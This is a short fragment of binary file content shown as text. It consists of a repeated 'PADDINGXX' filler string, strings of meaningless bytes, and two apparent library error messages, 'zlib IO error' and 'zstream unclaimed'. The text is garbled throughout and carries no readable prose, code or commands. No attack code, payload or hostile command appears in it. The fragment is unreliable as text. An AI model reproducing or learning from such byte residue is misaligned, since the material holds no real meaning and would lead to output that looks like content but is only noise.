DDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING
XY[Z[]
){y{1{y{1
=YARGtD= BGRt
){y{!cac
YHYtLHt9
YX[(W	
_^][YY
zlib IO error
zstream unclaimed
|z;^<}uWS
!ZYZ!9<9
Z]Z!141
Z]Z!989
Z]Z!JMJ